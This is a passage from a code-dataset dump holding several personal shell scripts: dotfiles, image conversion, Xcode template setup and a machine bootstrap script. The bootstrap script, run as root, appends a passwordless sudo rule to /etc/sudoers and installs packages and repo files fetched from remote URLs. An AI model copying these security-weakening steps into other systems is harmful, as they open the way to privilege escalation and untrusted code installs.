blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
eb704a4d1ee711f16642aec2871ae4dc150914e0
|
Shell
|
sproul/multivcs_query
|
/src.repo_parser/change_tracker.sh
|
UTF-8
| 683
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Usage: change_tracker.sh [-dry] json_fn1 json_fn2
#
# Given 2 JSON files containing source control version information for each of 2 packaged products, this utility will determine the source changes that occurred between these two packages and list the changed files.

# Run from the script's own directory so the sourced include and cli_main.rb
# resolve regardless of where the script was invoked from.
cd "$(dirname "$0")" || exit 1
. change_tracker.inc

# Forward arguments verbatim -- "$@" preserves arguments containing spaces,
# unlike the previous unquoted $* -- and strip known-noise ruby warnings.
ruby -wS cli_main.rb "$@" 2>&1 | sed -e '/warning: setting Encoding/d' -e '/: warning: Insecure world writable dir/d'
exit

# Dead scratch commands below were unreachable after the `exit` above;
# commented out so they can never run if the exit is ever removed.
# bx $dp/git/change_tracker/src/change_tracker.sh
# exit
# bx $dp/git/change_tracker/src/change_tracker.sh -list_changes_betweenf $dp/git/change_tracker/src/public/test_cspec_set1_v2.json $dp/git/change_tracker/src/public/test_cspec_set2_v2.json
| true
|
fc26aa862b6ffd7f90bab99ae8b7fa6c15546b35
|
Shell
|
2122-5ahif-nvs/02-microproject-SpasenovicBozidar
|
/part1.sh
|
UTF-8
| 229
| 2.609375
| 3
|
[] |
no_license
|
# Rebuild the asciidoc output directory from scratch.
BUILD_DIR="docs"

# Start clean, then recreate the tree.
rm -rf -v "$BUILD_DIR";
# BUGFIX: use $BUILD_DIR consistently instead of hard-coding "docs", so
# changing the variable actually changes the target.
mkdir -p "$BUILD_DIR";
mkdir -p "$BUILD_DIR/images";

# Copy the doc sources (quoted to survive paths with spaces).
cp -r -p -v asciidocs/docinfo.html "$BUILD_DIR";
cp -r -p -v asciidocs/*.adoc "$BUILD_DIR";
cp -r -p -v asciidocs/images/* "$BUILD_DIR/images";
| true
|
4a54bea0a8c172ba3b1f875f5e088344a80cbbf9
|
Shell
|
ayakix/Xcode-Template
|
/xcodeTemplate/deploy_templates.sh
|
UTF-8
| 487
| 3.125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Install the stock "Cocoa Touch Class" Xcode file template (plus the local
# customized copy in this directory) under the user's "Custom" template group.

template_name="Custom"
cocoa_touch_template="Cocoa Touch Class.xctemplate"
xcode_source_templates="/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Xcode/Templates/File Templates/Source"
original_dir="$xcode_source_templates/$cocoa_touch_template"
custom_dir="$HOME/Library/Developer/Xcode/Templates/File Templates/$template_name"

# Create the destination group when it does not exist yet.
[ -d "$custom_dir" ] || mkdir -p "$custom_dir"

# Copy Xcode's bundled template first, then overlay the local one.
cp -r "$original_dir" "$custom_dir"
cp -r "$cocoa_touch_template" "$custom_dir"
| true
|
fad1b1020587ae44fd08bb76f74a4715b6c44534
|
Shell
|
aChanEP/nextGenImageCreation
|
/Scripts/ConvertFiles.sh
|
UTF-8
| 2,059
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# Convert every file in ./Images into "next gen" web formats (webp, jp2),
# plus resized jpgs and low-quality placeholder images, all written under
# ./Images/converted. Requires ImageMagick's `convert`.
mkdir ./Images/converted
# Create the folder to store Next Gen images
mkdir ./Images/converted/jp2
mkdir ./Images/converted/webp
# mkdir ./Images/JXRFiles
mkdir ./Images/converted/Placeholders
mkdir ./Images/converted/jpg
# BUGFIX: the non-PNG placeholder branch below writes into ./converted/png,
# which was never created, so those conversions always failed.
mkdir ./Images/converted/png
# Go into Image directory for easier understanding
cd Images
# Loop through all images in the Image directory
for file in *; do
	# This means, do not run this code on a directory, only on a file (-f)
	if [[ -f $file ]]; then
		# something.jpg -> something (parameter expansion; same result as
		# the old `echo | cut -d'.' -f1` without forking two processes)
		fileName="${file%%.*}"
		# Create placeholder and move to Placeholder folder
		# These options are temporary and definitely have room for improvement
		if [[ $file == *.png ]]; then
			# -strip gets rid unnecessary metadata
			# -quality 1 - 100, specifies image quality
			# -resize creates thumbnail like images 4096@ = 64x64 16384@ 128x128
			convert "$file" -strip -quality 1 -colors 255 -resize 4096@ "./converted/Placeholders/$fileName.png"
		else
			convert "$file" -strip -quality 20 -resize 16384@ "./converted/png/$fileName.jpg"
		fi
		# TODO: Need to make images smaller too...
		# Conversion to Next Gen formats, using solely imageMagick defaults
		## We need to downsize every single file...
		# resize and convert to webp
		convert "$file" -quality 100 -resize 620x620 "./converted/webp/$fileName-768w.webp"
		convert "$file" -quality 100 -resize 490x490 "./converted/webp/$fileName-1092w.webp"
		convert "$file" -quality 100 -resize 450x450 "./converted/webp/$fileName-2800w.webp"
		# resize and convert to jp2
		convert "$file" -resize 620x620 "./converted/jp2/$fileName-768w.jp2"
		convert "$file" -resize 490x490 "./converted/jp2/$fileName-1092w.jp2"
		convert "$file" -resize 450x450 "./converted/jp2/$fileName-2800w.jp2"
		# resize and convert $file to jpg
		convert "$file" -resize 620x620 "./converted/jpg/$fileName-768w.jpg"
		convert "$file" -resize 490x490 "./converted/jpg/$fileName-1092w.jpg"
		convert "$file" -resize 450x450 "./converted/jpg/$fileName-2800w.jpg"
	fi
done
# Go back down
cd ..
| true
|
9c0f4751a2c0edbdb739c373dc4becfeaf2e8e1b
|
Shell
|
sunshine2995/Weeds
|
/rc.d/bashrc
|
UTF-8
| 4,799
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
# Load bashrc on MacOS
if [ `uname` = "Darwin" ]; then
alias ls='ls -G'
fi
# Set PS1
# Root gets a red prompt; non-root users a yellow user / blue "$" prompt.
if [ `id -u` == 0 ]; then
PS1="\[$(tput bold)\]\[$(tput setaf 1)\]\u\[$(tput sgr0)\]\[$(tput setaf 4)\]@\[$(tput sgr0)\]\[$(tput setaf 5)\]\h \[$(tput sgr0)\]\w\[$(tput bold)\]\[$(tput setaf 1)\] \\$ \[$(tput sgr0)\]"
else
PS1="\[$(tput bold)\]\[$(tput setaf 3)\]\u\[$(tput sgr0)\]\[$(tput setaf 4)\]@\[$(tput sgr0)\]\[$(tput setaf 5)\]\h \[$(tput sgr0)\]\w\[$(tput bold)\]\[$(tput setaf 4)\] \\$ \[$(tput sgr0)\]"
fi
# enable color support of ls and also add handy aliases
# (dircolors is GNU-only, so this block is effectively Linux-only)
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# Timestamp every entry shown by `history`.
export HISTTIMEFORMAT="[%y-%m-%d_%T] "
alias grep='grep --color=auto --exclude-dir={.git,.hg,.svn}'
export GREP_COLOR='1;31'
# Prepend the personal script directory when it exists.
if [ -d $HOME/.bin ]; then
export PATH=$HOME/.bin:$PATH
fi
# brew
# NOTE(review): BREWHOME is hard-coded to /usr/local; on Apple Silicon brew
# lives in /opt/homebrew -- confirm before relying on these build flags.
if which brew > /dev/null; then
# BREWHOME=`brew --prefix`
BREWHOME="/usr/local"
export LDFLAGS="-L$BREWHOME/lib"
export CPPFLAGS="-I$BREWHOME/include"
export PKG_CONFIG_PATH="$BREWHOME/lib/pkgconfig"
fi
# Golang env
export GOPATH="$HOME/Golang"
export PATH="$GOPATH/bin:$PATH"
# Pyenv
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
if which pyenv > /dev/null; then
eval "$(pyenv init -)";
eval "$(pyenv virtualenv-init -)"
# alias
alias pyv='python --version;pyenv version'
alias chpy='pyenv global'
alias chlpy='pyenv local'
alias chgpy='pyenv global'
# func
# Activate a virtualenv: $1 may be a venv directory (sources bin/activate)
# or an activate script itself.
wk () {
if [[ -d "$1" ]]; then
source $1/bin/activate
elif [[ -f "$1" ]]; then
source $1
else
echo 'Venv: No such file or directory:' $1
fi
}
fi
# Custom alias
alias l='ls -Clho'
alias ll='ls -ClhF'
alias la='ls -A'
alias rs='rsync -cvrP --exclude={.git,.hg,.svn}'
alias pweb='python -m SimpleHTTPServer'
alias psgrep='ps ax|grep -v grep|grep'
alias tree='tree -C --dirsfirst'
alias less='less -N'
alias tkill='tmux kill-session -t'
alias aria='aria2c -c -x 16'
alias myip='echo $(curl -s https://api.ipify.org)'
# macOS-only helpers.
if [ `uname` = "Darwin" ]; then
alias tailf='tail -F'
alias rmds='find ./ | grep ".DS_Store" | xargs rm -fv'
alias showfiles="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hidefiles="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
fi
# Python alias
alias py='python'
alias py2='python2'
alias py3='python3'
alias ipy='ipython'
alias ipy2='ipython2'
alias ipy3='ipython3'
alias pep='pep8 --ignore=E501'
alias rmpyc='find ./ | grep "py[co]$" | xargs rm -fv'
# Git alias
alias gst='git status -sb'
alias gdf='git difftool'
alias glg='git log --graph --max-count=10'
alias gco='git checkout'
alias gmg='git merge --no-commit --squash'
# pgrep && top
topgrep() {
	# Live `top` view limited to the processes whose name matches $1.
	local cmdline pid
	if [ "$(uname)" = "Darwin" ]; then
		# macOS top wants one "-pid <n>" flag per process.
		cmdline="top"
		for pid in $(pgrep $1); do
			cmdline+=" -pid $pid"
		done
		eval $cmdline
	else
		# Linux top takes a single comma-separated list after -p.
		cmdline="top -p "
		for pid in $(pgrep $1); do
			cmdline+="$pid,"
		done
		eval ${cmdline%%,}
	fi
}
# Proxy
proxy() {
	# Toggle the local SOCKS5 proxy via the ALL_PROXY environment variable.
	if [ -n "$ALL_PROXY" ]; then
		unset ALL_PROXY;
		printf 'Proxy off\n';
	else
		export ALL_PROXY="socks5://127.0.0.1:1080"
		printf 'Proxy on\n';
	fi
}
# ssh gate
gfw() {
	# (Re)establish a background SOCKS tunnel (-D 7070) through root@box,
	# first killing any previously running instance.
	local GFW_PID=$(ps ax|grep -v grep|grep 'ssh -qTfnN -D 7070 root@box'|awk '{print $1}')
	# BUGFIX: the old `[ ! -e $GFW_PID ]` tested for a *file* named after the
	# PID; test for a non-empty PID string instead.
	if [ -n "$GFW_PID" ]; then
		# $GFW_PID intentionally unquoted: may hold several whitespace-
		# separated PIDs, one per matching ssh process.
		kill -9 $GFW_PID
	fi
	ssh -qTfnN -D 7070 root@box
}
# check ip
chkip() {
	# Geolocate this host's public IP (no args) or each IP/host passed as an
	# argument via ip-api.com, separating consecutive reports with a blank line.
	local PYCODE="import sys,json;o=json.load(sys.stdin);s1='IP : %(query)s\nLoc: %(city)s / %(regionName)s / %(country)s\nPos: %(lat)s / %(lon)s';s2='IP : %(query)s\nInf: %(message)s';s=s2 if 'message' in o else s1;print(s % o);"
	if [[ $# == 0 ]]; then
		curl -s "http://ip-api.com/json/" | python -c "$PYCODE"
	else
		local IP i=0
		# "$@" (quoted) keeps each argument intact; the old unquoted $@ split.
		for IP in "$@"; do
			curl -s "http://ip-api.com/json/$IP" | python -c "$PYCODE"
			((i++))
			# BUGFIX: `[[ $i < $# ]]` was a lexicographic string comparison
			# (wrong once $# reaches 10); compare arithmetically.
			if (( i < $# )); then
				echo ''
			fi
		done
	fi
}
# enter docker container
ent() {
	# Open an interactive bash shell inside the container named/ID'd by $1.
	# BUGFIX: quote "$1" so a container name can never word-split or glob.
	docker exec -it "$1" /bin/bash
}
# automatic set_window_title when use screen
# Inside GNU screen ($TERM starts with "screen"), keep the window title in
# sync with the current directory using the \ek...\e\\ title escape sequence.
if [[ "$TERM" == screen* ]]; then
screen_set_window_title () {
local HPWD="$PWD"
# Abbreviate the home directory as "~" for a shorter title.
case $HPWD in
$HOME) HPWD="~";;
$HOME/*) HPWD="~${HPWD#$HOME}";;
esac
printf '\ek%s\e\\' "$HPWD"
}
# Run before every prompt, preserving any pre-existing PROMPT_COMMAND.
PROMPT_COMMAND="screen_set_window_title; $PROMPT_COMMAND"
fi
| true
|
92978aadd81361ccb80b9d1949e758ec21df74f6
|
Shell
|
CloudVPS/openpanel-openapp-call
|
/openapp-call
|
UTF-8
| 923
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
# This file is part of OpenPanel - The Open Source Control Panel
# OpenPanel is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, using version 3 of the License.
#
# Please note that use of the OpenPanel trademark may be subject to additional
# restrictions. For more information, please visit the Legal Information
# section of the OpenPanel website on http://www.openpanel.com/

# Dispatch a call to /usr/bin/openapp-<app>-<script>, optionally feeding
# argument 3 to it on stdin; exits 1 with a short message on any failure.

APP="$1"
if [ -z "$APP" ]; then
	echo "Need application identifier"
	exit 1
fi

SCR="$2"
if [ -z "$SCR" ]; then
	echo "Need script identifier"
	exit 1
fi

handler="/usr/bin/openapp-$APP-$SCR"
if [ ! -x "$handler" ]; then
	echo "Script not found"
	exit 1
fi

DATA="$3"
if [ -n "$DATA" ]; then
	echo "$DATA" | "$handler" stdin || {
		echo "Call failed"
		exit 1
	}
else
	"$handler"
	exit 0
fi
| true
|
07ed296d2815e4a1fdfde2211bccc899a0b68162
|
Shell
|
camuso/scripts
|
/init-my-stuff
|
UTF-8
| 11,116
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# init-my-stuff 1.0
#
# Clone or refresh personal environment repos and scripts, sync rc/etc
# backups into place, and optionally (-i, when run as root) install the
# development toolchain.
#
# Options:
#   -i  install development packages after syncing
#   -p  clone via ssh (push-capable) github URLs instead of https
#   -g  clears b_gitrepo (flag parsed; not otherwise read in this script)
#   -h  currently only counted; TODO(review): print usage text here
#
# set -x
declare -i optcount=0
declare remotename                  # optional $1: remote user for fixup step
declare logfile="$HOME/.initmystuff.log"
declare repolist="rcbak hints etcbk misc ipmi"
declare b_pushpriv=false
declare b_gitrepo=true
declare clonestr                    # "git clone <url-prefix>" built later
declare distro
declare installagent                # dnf | yum | apt-get, detected below
declare installflags
declare fetched=false               # NOTE(review): never read in this script
# BUGFIX: this was "declare majersion=" (typo); every later use is majversion.
declare majversion=
declare b_install=false
declare pkg=
echo "Installing environment on ..."
hostname
echo
while getopts hipg OPTION; do
    case "$OPTION" in
	h ) optcount=$((optcount+1))
	    ;;
	i ) optcount=$((optcount+1))
	    b_install=true
	    ;;
	p ) optcount=$((optcount+1))
	    b_pushpriv=true
	    ;;
	g ) optcount=$((optcount+1))
	    b_gitrepo=false
	    ;;
	* ) echo "unrecognized option -$OPTION"
	    exit 127
    esac
done
shift $optcount
remotename="$1"
# ========================================================================
# To determine whether dnf or yum is the installagent, get the distro and
# version numbers.
# ------------------------------------------------------------------------
#
if [ -f /etc/os-release ]; then
foo=$(grep -w 'ID' /etc/os-release | cut -d"=" -f2)
# Strip off the double quote marks
#
foo=${foo%\"}
foo=${foo#\"}
# distro is the lowercase of the ID we pulled out of /etc/os-release
#
distro=$(echo "$foo" | tr '[:upper:]' '[:lower:]')
# ([ "$distro" == "rhel" ] || [ "$distro" == "fedora" ]) || \
# { echo "$distro is not Redhat" }
echo "Distro: $distro"
if [[ "$distro" == "fedora" ]]; then
installagent=dnf
installflags="--allowerasing --best"
elif [[ "$distro" == "rhel" ]] || [[ "$distro" == "centos" ]]; then
# Get the major version and strip off any leading double quotes
#
majversion=$(grep -w 'VERSION_ID' /etc/os-release | cut -d= -f2 | cut -d. -f1)
majversion=${majversion#\"}
majversion=${majversion%\"}
echo "majversion: $majversion"
# Determine the install agent based on the major version
#
if [ $majversion -lt 8 ]; then
installagent="yum"
installflags="--nogpgcheck --skip-broken"
else
installagent="dnf"
installflags="--allowerasing --best"
fi
elif [[ "$distro" == "ubuntu" ]]; then
installagent='apt-get'
else
echo "$distro is not a distro supported by this script."
fi
else
echo "No /etc/os-release file. Assuming distro is RHEL less than 8."
distro="rhel"
installagent="yum"
installflags="--nogpgcheck --skip-broken"
fi
# ========================================================================
# Can't go any further without which rsync and git
# ------------------------------------------------------------------------
#
$installagent install -y which
which rsync
[ $? -eq 0 ] || $installagent install -y rsync
which git
[ $? -eq 0 ] || $installagent install -y git
cd # make sure we're home
> "$logfile" # init the log file
# If we're creating a system that will have push privileges to the
# repos, then use ssh access, else use http.
# For ssh access, the user will have to add the ssh key to the github
# account.
#
$b_pushpriv && clonestr="git clone git@github.com:camuso/" \
|| clonestr="git clone https://github.com/camuso/"
# If we don't have an ssh key, generate it.
#
[ -f $HOME/.ssh/id_rsa ] || \
ssh-keygen -N "" -f $HOME/.ssh/id_rsa | tee -a "$logfile" 2>&1
echo "*******************************" | tee -a "$logfile"
echo "* Clone or update Env Files *" | tee -a "$logfile"
echo "* Version 3.0 *" | tee -a "$logfile"
echo "*******************************" | tee -a "$logfile"
echo
# For each personal repo: pull if it is already a git checkout, replace a
# plain directory with a clone, or clone it fresh.
for repo in $repolist; do
if [ -e $repo ]; then
if [ -d "$repo"/.git ]; then
echo "Updating $repo" | tee -a "$logfile" 2>&1
cd $repo
git config pull.rebase false
git pull
cd -
else
echo "Converting directory $repo to git repo" | tee -a "$logfile" 2>&1
rm -rf $repo
$clonestr$repo.git $repo
cd $repo
git config pull.rebase false
# NOTE(review): unlike the update branch, this path never does `cd -`,
# so subsequent iterations run inside this repo -- confirm intended.
fi
else
echo "Cloning $repo ..." | tee -a "$logfile" 2>&1
$clonestr$repo.git $repo
fi
# chown -R tcamuso.tcamuso $repo
# chmod -R u+wrx,go+rx,go-w $repo
done
echo -e "---------------" | tee -a "$logfile"
echo "*******************************" >> "$logfile" 2>&1
echo "* Clone or update bin scripts *" >> "$logfile" 2>&1
echo "*******************************" >> "$logfile" 2>&1
echo
# Update or create the bin directory.
#
if [ -d bin/.git ]; then
cd bin
echo "Updating bin repo..." | tee -a "$logfile" 2>&1
git config pull.rebase false
git pull
else
[ -e bin ] && rm -rf bin
echo "Creating bin repo..." | tee -a "$logfile" 2>&1
${clonestr}scripts.git bin
cd bin
git config pull.rebase false
fi
cd
echo "Returning to $PWD..."
echo -e "---------------\n" | tee -a "$logfile"
# Copy etc and rc files out of their archive directories into their respective
# real directories, but only if they're newer.
#
echo "************************************************" >> "$logfile" 2>&1
echo "* Copying Env files from Backup Directories *" >> "$logfile" 2>&1
echo "* but only if they're newer than existing ones *" >> "$logfile" 2>&1
echo "************************************************" >> "$logfile" 2>&1
echo >> "$logfile" 2>&1
echo "rsync contents of rcbak to home directory" | tee -a "$logfile"
rsync -Pat --cvs-exclude rcbak/ . 2>&1 | tee -a $logfile
echo -e "---------------\n" | tee -a "$logfile"
# Can only do the following if root
#
if [ $(id -u) -eq 0 ]; then
useradd tcamuso
echo 'tcamuso ALL=(ALL)NOPASSWD: ALL' >> /etc/sudoers
echo "rsync contents of etcbk to /etc" | tee -a "$logfile"
rsync -Pat --cvs-exclude etcbk/ /etc/.| tee -a "$logfile"
echo -e "---------------\n" | tee -a "$logfile"
fi
echo "************************************************" >> "$logfile" 2>&1
echo >> "$logfile" 2>&1
# If we have a "user" it's because were running remotely, so
# do the remote cleanup.
#
if [ "$remotename" ]; then
echo "*********************" >> "$logfile" 2>&1
echo "* Doing Rmote Fixup *" >> "$logfile" 2>&1
echo "*********************" >> "$logfile" 2>&1
echo "" >> "$logfile" 2>&1
bin/fixup-rsync $remotename | tee -a "$logfile"
fi
cd -
echo
# If we are running as root and install has been requested, then install
# the development tools.
#
get_rcmtools()
{
# Install a Red Hat internal rcm-tools yum/dnf repo file matching the
# detected distro/major version (plus, on RHEL 8/9, the kernel-devtools
# copr repo). Returns 1 when the major version is unrecognized.
# if rcm-tools is already installed with the distro, then skip this.
[ -f /etc/yum.repos.d/rcm-tools.repo ] && return
echo -n "Installing rcm tools for " | tee -a "$logfile"
if [[ "$distro" == "fedora" ]]; then
echo "fedora" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/internal/rcm-tools-fedora.repo \
| tee -a "$logfile"
return
fi
case "$majversion" in
"6" ) echo "$distro-6" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-6-server.repo
return 0
;;
"7" ) echo "$distro-7" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-7-server.repo
return 0
;;
"8" ) echo "$distro-8" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-8-baseos.repo
curl -k -L -o /etc/yum.repos.d/kernel-devtools.repo \
https://copr.fedorainfracloud.org/coprs/bmeneguele/rhkernel-devtools/repo/epel-8/bmeneguele-rhkernel-devtools-epel-8.repo
return 0
;;
"9" ) echo "$distro for RHEL-9" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.eng.brq.redhat.com/rel-eng/internal/rcm-tools-rhel-9-baseos.repo
# NOTE(review): RHEL-9 still pulls the epel-8 devtools repo -- confirm.
curl -k -L -o /etc/yum.repos.d/kernel-devtools.repo \
https://copr.fedorainfracloud.org/coprs/bmeneguele/rhkernel-devtools/repo/epel-8/bmeneguele-rhkernel-devtools-epel-8.repo
return 0
;;
esac
# Unknown major version: terminate the "Installing ..." line and fail.
echo ""
return 1
}
get_epel() {
	# Install the EPEL release RPM matching the detected RHEL/CentOS major
	# version (yum for 6/7, dnf for 8/9). Returns 1, after terminating the
	# progress line, when the version is unrecognized.
	local label agent url
	echo -n "Installing EPEL for " | tee -a "$logfile"
	case "$majversion" in
	"6" ) label="$distro-6"
	      agent=yum
	      url=https://archives.fedoraproject.org/pub/archive/epel/6/x86_64/epel-release-6-8.noarch.rpm
	      ;;
	"7" ) label="$distro-7"
	      agent=yum
	      url=https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
	      ;;
	"8" ) label="$distro-8"
	      agent=dnf
	      url=https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm
	      ;;
	"9" ) label="$distro-8 for $distro-9"
	      agent=dnf
	      url=https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm
	      ;;
	* )   echo | tee -a "$logfile"
	      return 1
	      ;;
	esac
	echo "$label" | tee -a "$logfile"
	$agent install -y "$url"
	return 0
}
get_certs()
{
	# Install the Red Hat internal certificates via ~/bin/install-rhit-cert,
	# temporarily hiding an already-installed rcm-tools repo file so the
	# distro-provided copy is favored over the downloaded one.
	#
	# If rcm tools are already installed, favor them over the downloaded ones.
	#
	local b_rcmsaved=false
	if [ -f /etc/yum.repos.d/rcm-tools.repo ]; then
		mv /etc/yum.repos.d/rcm-tools.repo /etc/yum.repos.d/rcm-tools.repo.save
		b_rcmsaved=true
	fi
	# `command -v` is the portable replacement for the external `which`
	# (and no longer leaks the tool's path to stdout).
	command -v wget > /dev/null || yum install -y wget
	# install the RH certs
	# See: https://docs.engineering.redhat.com/display/RCMDOC/RCM+Tools+Release+Guide#RCMToolsReleaseGuide-Installredhat-internal-cert-installrpm
	#
	~/bin/install-rhit-cert
	# BUGFIX: the old trailing `$b_rcmsaved && mv ...` made the function
	# return 1 on the common nothing-was-saved path; an if-statement keeps
	# the restore while returning 0.
	if $b_rcmsaved; then
		mv /etc/yum.repos.d/rcm-tools.repo.save /etc/yum.repos.d/rcm-tools.repo
	fi
}
# Package-install phase: only when -i was given AND we were invoked for root.
if $b_install && [ "$remotename" == "root" ]; then
declare arch=$(uname -m)
declare rcmurl=""
# NOTE(review): this re-declares installagent empty, discarding the agent
# detected earlier; it is re-set per-distro below -- confirm intended.
declare installagent=""
get_certs
get_rcmtools
dnf copr enable -y bmeneguele/rhkernel-devtools
if [ "$distro" == "fedora" ]; then
installagent=dnf
dnf copr enable -y james/centpkg
dnf install -y fedpkg rhel-packager centpkg-sig
fi
if [[ "$distro" == "rhel" ]] || [[ "$distro" == "centos" ]]; then
get_epel
installagent=yum
fi
# $installagent groupinstall -y 'X Window System' 'GNOME'
$installagent group install -y "Development Tools"
# Install packages one at a time so a single failure does not abort the
# rest; every result is appended to the log.
# NOTE(review): annobin-annocheck appears twice in this list.
for pkg in \
annobin-annocheck \
automake \
annobin \
annobin-annocheck \
centpkg \
elfutils-libelf-devel \
gcc \
gcc-c++ \
go \
bc \
bind-utils \
bison \
brewkoji \
ca-certificates \
cmake \
conserver-client \
cscope \
dwarves libdwarves1 \
elfutils-devel elfutils-libs elfutils-libelf \
elinks \
ethtool \
flex \
git-email \
golang \
hostname \
ipmitool \
kmod \
kmod-libs \
krb5-workstation krb5-libs \
lab \
libdwarf libdwarf-devel \
lynx \
make \
mutt \
ncurses ncurses-devel \
net-tools \
nmap \
OpenIPMI \
openssl openssl-devel \
patch patchutils \
perl \
pv \
python-bugzilla-cli \
rhpkg \
rpm-build \
rsync \
texinfo \
tpm-tools \
usbutils \
vim vim-enhanced vim-filesystem \
watchdog \
waiverdb-cli \
xclip \
xorg-x11-apps \
xz \
zenity \
; do
$installagent install -y $installflags $pkg \
2>&1 | tee -a $logfile
done
# orphaned packages
#
# trousers trousers-devel \
# koji \
# http://dl.fedoraproject.org/pub/epel/7/x86_64/q/quilt-0.63-2.el7.noarch.rpm
# vim-powerline \
# krb5-auth-dialog \
# kmodtool \
# python-bugzilla \
# git-lab-porcelain \
fi
# We're gonna quit here, because we need to create the /work mountpoint as a logical
# volume. For that, we will use mkworkdir interactively.
# The creation of the repos will be done separately at command line of the new
# system.
#
exit 0
| true
|
3e6dbde7138648f9c51105534749ca76ea6feb85
|
Shell
|
snsinfu/dotfiles
|
/.zsh/init.zsh
|
UTF-8
| 767
| 3.765625
| 4
|
[] |
no_license
|
# Resolve the directory containing this file: %x is the path of the script
# being sourced; the :a:h modifiers make it absolute, then take its head
# (directory). Then load the rc and plugin modules next to it.
ZSHRC_ROOT="${${(%):-%x}:a:h}"
source "${ZSHRC_ROOT}/rc.zsh"
source "${ZSHRC_ROOT}/plugin.zsh"
# User-facing entry point: `zshrc <subcommand> [args...]` dispatches to the
# __zshrc::* helpers defined in the sourced modules; defaults to `help`.
zshrc() {
local subcommand=help
if [ $# -gt 0 ]; then
subcommand=$1
shift 1
fi
case "${subcommand}" in
plugin)
__zshrc::plugin::plugin "$@"
;;
update)
# Update all plugins, then reload the rc so changes take effect.
__zshrc::plugin::update
__zshrc::rc::reload
;;
reload)
__zshrc::rc::reload
;;
help)
__zshrc::help
;;
*) echo "unrecognized subcommand: ${subcommand}" >&2
return 1
esac
}
__zshrc::help() {
	# Print usage for the zshrc() dispatcher.
	# BUGFIX: the heredoc previously had no consuming command, so
	# `zshrc help` printed nothing; feed it to cat.
	cat << EOS
zshrc plugin <origin> - install plugin
zshrc update - update all plugins
zshrc reload - reload .zshrc
zshrc help - print this message
EOS
}
# NOTE(review): __zshrc::rc::rc is not defined in this file; presumably it
# lives in rc.zsh -- confirm it is not a typo for __zshrc::rc::reload.
__zshrc::rc::rc
| true
|
db8238c04b184d0ffbedf00cf2873c6359415063
|
Shell
|
michaelaguiar/dotfiles
|
/.macos
|
UTF-8
| 3,933
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Personal macOS setup: set hostnames, enable automatic software updates,
# tweak Dock / Mission Control / Finder defaults, then restart the affected
# apps so the changes take effect.
# Close any open System Preferences panes
osascript -e 'tell application "System Preferences" to quit'
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until `.macos` has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# Set computer name (as done via System Preferences โ Sharing)
sudo scutil --set ComputerName "Ghost"
sudo scutil --set HostName "Ghost"
sudo scutil --set LocalHostName "Ghost"
###############################################################################
# Software Update #
###############################################################################
# System Preferences > Software Update > Advanced > Automatically: Check for updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -bool true
# System Preferences > Software Update > Advanced > Automatically: Download new updates when available
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -bool true
# System Preferences > Software Update > Advanced > Automatically: Install macOS updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool true
# System Preferences > Software Update > Advanced > Automatically: Install app updates from the App Store
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutoUpdate -bool true
# System Preferences > Software Update > Advanced > Automatically: Install system data files and security updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool true
###############################################################################
# Dock & Menu Bar #
###############################################################################
# System Preferences > Dock & Menu Bar > Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
###############################################################################
# Mission Control #
###############################################################################
# System Preference > Mission Control > Automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
###############################################################################
# Finder #
###############################################################################
# NOTE(review): PlistBuddy `Set` fails if the key does not already exist in
# com.apple.finder.plist -- confirm these keys are present on a fresh system.
# Desktop > Show View Options > Stack By: Kind
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:GroupBy Kind" ~/Library/Preferences/com.apple.finder.plist
# Desktop > Show View Options > Sort By: Name
